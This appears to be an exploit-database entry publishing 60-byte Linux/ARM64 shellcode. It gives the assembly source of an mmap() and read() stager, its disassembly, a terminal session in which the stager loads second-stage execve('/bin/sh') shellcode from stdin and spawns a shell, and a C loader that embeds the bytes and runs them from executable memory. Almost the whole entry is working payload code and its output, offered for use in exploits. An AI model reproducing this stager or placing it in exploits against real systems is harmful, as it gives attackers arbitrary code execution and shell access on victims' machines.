Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes)

2019-07-01
ID: 101658
CVE: None
Download vulnerable application: None
/*
# Title:  
# Date:   2019-06-30
# Tested: Ubuntu 16.04 (aarch64)
# Author: Ken Kitahara
# Compilation: gcc -o loader loader.c


[email protected]:~/works$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu Xenial Xerus (development branch)
Release:	16.04
Codename:	xenial
[email protected]:~/works$ uname -a
Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
[email protected]:~/works$ cat stager.s
.section .text
.global _start
_start:
    // *ret = mmap(0, 0x1000, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0)
    mov  x8, #222             // Systemcall Number = 222 (mmap)
    mov  x0, xzr              // args[0] = 0x0
    mov  x3, 0x22             // args[3] = 0x22
    mvn  x4, xzr              // args[4] = -1 (0xffffffffffffffff)
    mov  x5, xzr              // args[5] = 0x0
    lsr  x2, x4, #61          // args[2] = 0x7
    add  x1, x2, #0xFF9       // args[1] = 0x1000
    svc  #0x1337              // Invoke Systemcall
    //read(0, *ret, 0x1000)
    mov  x2, x1               // args[2] = 0x1000 
    add  x1, x0, xzr, lsl #12 // args[1] = *ret
    mov  x10, x1              // save *ret to x10
    mov  x0, xzr              // args[0] = 0x0
    mov  x8, #63              // Systemcall Number = 63 (read)
    svc  #0x1337              // Invoke Systemcall
    br   x10                  // Jump to loaded shellcode
[email protected]:~/works$ as -o stager.o stager.s && ld -o stager stager.o
[email protected]:~/works$ objdump -d ./stager

./stager:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000400078 <_start>:
  400078:	d2801bc8 	mov	x8, #0xde                  	// #222
  40007c:	aa1f03e0 	mov	x0, xzr
  400080:	d2800443 	mov	x3, #0x22                  	// #34
  400084:	aa3f03e4 	mvn	x4, xzr
  400088:	aa1f03e5 	mov	x5, xzr
  40008c:	d37dfc82 	lsr	x2, x4, #61
  400090:	913fe441 	add	x1, x2, #0xff9
  400094:	d40266e1 	svc	#0x1337
  400098:	aa0103e2 	mov	x2, x1
  40009c:	8b1f3001 	add	x1, x0, xzr, lsl #12
  4000a0:	aa0103ea 	mov	x10, x1
  4000a4:	aa1f03e0 	mov	x0, xzr
  4000a8:	d28007e8 	mov	x8, #0x3f                  	// #63
  4000ac:	d40266e1 	svc	#0x1337
  4000b0:	d61f0140 	br	x10
[email protected]:~/works$ (echo -en "\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4"; cat) | ./stager
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev)
exit

[email protected]:~/works$ objcopy -O binary stager stager.bin
[email protected]:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' stager.bin && echo
\xc8\x1b\x80\xd2\xe0\x03\x1f\xaa\x43\x04\x80\xd2\xe4\x03\x3f\xaa\xe5\x03\x1f\xaa\x82\xfc\x7d\xd3\x41\xe4\x3f\x91\xe1\x66\x02\xd4\xe2\x03\x01\xaa\x01\x30\x1f\x8b\xea\x03\x01\xaa\xe0\x03\x1f\xaa\xe8\x07\x80\xd2\xe1\x66\x02\xd4\x40\x01\x1f\xd6

*/

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] =
"\xc8\x1b\x80\xd2\xe0\x03\x1f\xaa\x43\x04\x80\xd2\xe4\x03\x3f\xaa"
"\xe5\x03\x1f\xaa\x82\xfc\x7d\xd3\x41\xe4\x3f\x91\xe1\x66\x02\xd4"
"\xe2\x03\x01\xaa\x01\x30\x1f\x8b\xea\x03\x01\xaa\xe0\x03\x1f\xaa"
"\xe8\x07\x80\xd2\xe1\x66\x02\xd4\x40\x01\x1f\xd6";

int main(int argc, char **argv) {
    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));

    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);

    if (ptr == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }

    memcpy(ptr, shellcode, sizeof(shellcode));
    sc = ptr;

    sc();

    return 0;
}
1.3.0 (www01)